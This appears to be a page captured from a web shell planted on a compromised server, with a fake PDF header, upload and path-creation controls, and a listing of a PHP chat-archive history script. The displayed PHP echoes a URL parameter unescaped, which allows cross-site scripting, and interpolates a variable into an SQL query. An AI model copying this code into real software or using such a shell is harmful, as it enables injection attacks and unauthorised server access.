%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/old2/_music/jabbarchive/
Upload File :
Create Path :
Current File : /www/old2/_music/jabbarchive/roster_conv.php

<h1>Flat history for <?php echo $_GET['them']; ?></h1>
<?php
          $res = q("select utc, body, them, id, dir from archive where us='$us' and them not like '%@conf%' order by utc desc limit 100");
          foreach($res as $r)
          {
		  $r[1] = str_replace('<', '&lt;', str_replace('>', '&gt;', $r[1]));
		  $style = $r[4] ? "outgoing" : "incoming";
               echo "<!-- {$r[3]} --><div class=\"$style\"><table width=\"100%\"><tr><td width=\"35%\" style=\"vertical-align:top;\">[{$r[0]}] <b><a href=\"./index.php?what=history-flat&amp;them=".urlencode($r[2])."\">{$r[2]}</a></b>:</td><td width=\"65%\">".nl2br($r[1])."</td></tr></table></div>\n";
          }
          echo "</table>\n";
?>

Zerion Mini Shell 1.0